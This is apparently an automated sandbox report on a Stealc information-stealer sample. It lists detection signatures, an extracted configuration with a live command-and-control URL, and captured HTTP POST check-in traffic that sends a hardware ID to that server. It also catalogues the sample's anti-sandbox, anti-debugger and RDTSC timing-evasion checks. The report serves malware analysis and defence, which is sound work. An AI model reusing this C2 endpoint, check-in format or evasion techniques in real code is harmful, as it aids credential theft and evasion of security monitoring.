Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523253
MD5:7104794e5bc6d9668df3a837983e43df
SHA1:6bbeef17a4443db7e332123055796aace85064d6
SHA256:e1eca91fddecc4eb0729d7a47e7950cd07bcfe3a195721c2ea132e79654a9fbf
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7104794E5BC6D9668DF3A837983E43DF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6968JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6968JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.470000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T11:06:56.881309+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.470000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.php2Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php(Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php$Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php0Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php/Virustotal: Detection: 17%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0047C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00477240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00477240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00479AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00479B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00488EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00488EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00484910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00484910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0047DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0047E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00484570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00484570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0047ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0047BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0047DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00483EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00483EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0047F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 46 36 39 45 33 34 37 32 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="hwid"1BF69E3472EB3294564547------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="build"doma------IEBFHCAKFBGDHIDHIDBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00474880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 46 36 39 45 33 34 37 32 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="hwid"1BF69E3472EB3294564547------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="build"doma------IEBFHCAKFBGDHIDHIDBK--
                Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
                Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
                Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
                Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
                Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37a

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE0_2_008470EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0081405A0_2_0081405A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083E98A0_2_0083E98A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008369920_2_00836992
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079E1FD0_2_0079E1FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D525A0_2_007D525A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00834AB70_2_00834AB7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00843AFE0_2_00843AFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C03EB0_2_007C03EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00839B550_2_00839B55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083337B0_2_0083337B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00848C690_2_00848C69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C65EE0_2_007C65EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084056C0_2_0084056C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00791E630_2_00791E63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083B6310_2_0083B631
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084566A0_2_0084566A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083CFC30_2_0083CFC3
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004745C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gbgxsggn ZLIB complexity 0.9950286764152364
                Source: file.exe, 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00489600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00489600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00483720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00483720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SLZY7IB3.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1856512 > 1048576
                Source: file.exeStatic PE information: Raw size of gbgxsggn is bigger than: 0x100000 < 0x19f200

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.470000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gbgxsggn:EW;lycvdkjm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gbgxsggn:EW;lycvdkjm:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00489860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c8b51 should be: 0x1cdca0
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gbgxsggn
                Source: file.exeStatic PE information: section name: lycvdkjm
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CA0CD push ebp; mov dword ptr [esp], edi0_2_008CA232
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push ebx; mov dword ptr [esp], 7143CB12h0_2_0087E8CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push esi; mov dword ptr [esp], 350B16FAh0_2_0087E9C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push 7897271Ah; mov dword ptr [esp], ecx0_2_0087E9E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push 0094117Bh; mov dword ptr [esp], ebx0_2_0087EA3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push edx; mov dword ptr [esp], ecx0_2_0087EA45
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push edi; mov dword ptr [esp], 7FEAC600h0_2_0087EA6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push ebx; mov dword ptr [esp], edx0_2_0087EB22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E8C5 push eax; mov dword ptr [esp], edi0_2_0087EB48
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009340CA push esi; mov dword ptr [esp], edi0_2_0093411F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 5DF1614Eh; mov dword ptr [esp], ecx0_2_008470F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 75952BD9h; mov dword ptr [esp], esp0_2_008470FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 577BDCD8h; mov dword ptr [esp], eax0_2_00847107
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push ecx; mov dword ptr [esp], 7B6D5C07h0_2_00847181
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push eax; mov dword ptr [esp], ecx0_2_008471AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 0A84D161h; mov dword ptr [esp], ebx0_2_008471DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 43DAD500h; mov dword ptr [esp], eax0_2_00847232
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 04E0A463h; mov dword ptr [esp], edx0_2_00847258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push ebx; mov dword ptr [esp], edx0_2_0084728A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push edi; mov dword ptr [esp], 0F4B41A9h0_2_008472D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 702D5DA7h; mov dword ptr [esp], ebx0_2_00847304
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 254253A1h; mov dword ptr [esp], esp0_2_00847319
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push eax; mov dword ptr [esp], ebx0_2_008473C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 439D5E55h; mov dword ptr [esp], esi0_2_00847443
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push edx; mov dword ptr [esp], 7BF4A8F4h0_2_008474DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 061708AAh; mov dword ptr [esp], esi0_2_00847514
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push ebp; mov dword ptr [esp], edi0_2_0084756B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 702ED301h; mov dword ptr [esp], ebp0_2_0084757B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 464B79A3h; mov dword ptr [esp], edx0_2_0084763D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push 23E74B00h; mov dword ptr [esp], ebp0_2_00847659
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008470EE push edx; mov dword ptr [esp], 00000069h0_2_0084767D
                Source: file.exeStatic PE information: section name: gbgxsggn entropy: 7.953932899320452

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00489860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13602
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1AC5 second address: 6D1ADA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jnp 00007F7F1CE19AA6h 0x00000011 pop edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E9DA second address: 84E9FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F1D21A777h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E9FD second address: 84EA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EA01 second address: 84EA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7F1D21A773h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EA21 second address: 84EA3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AB3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84EA3A second address: 84EA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
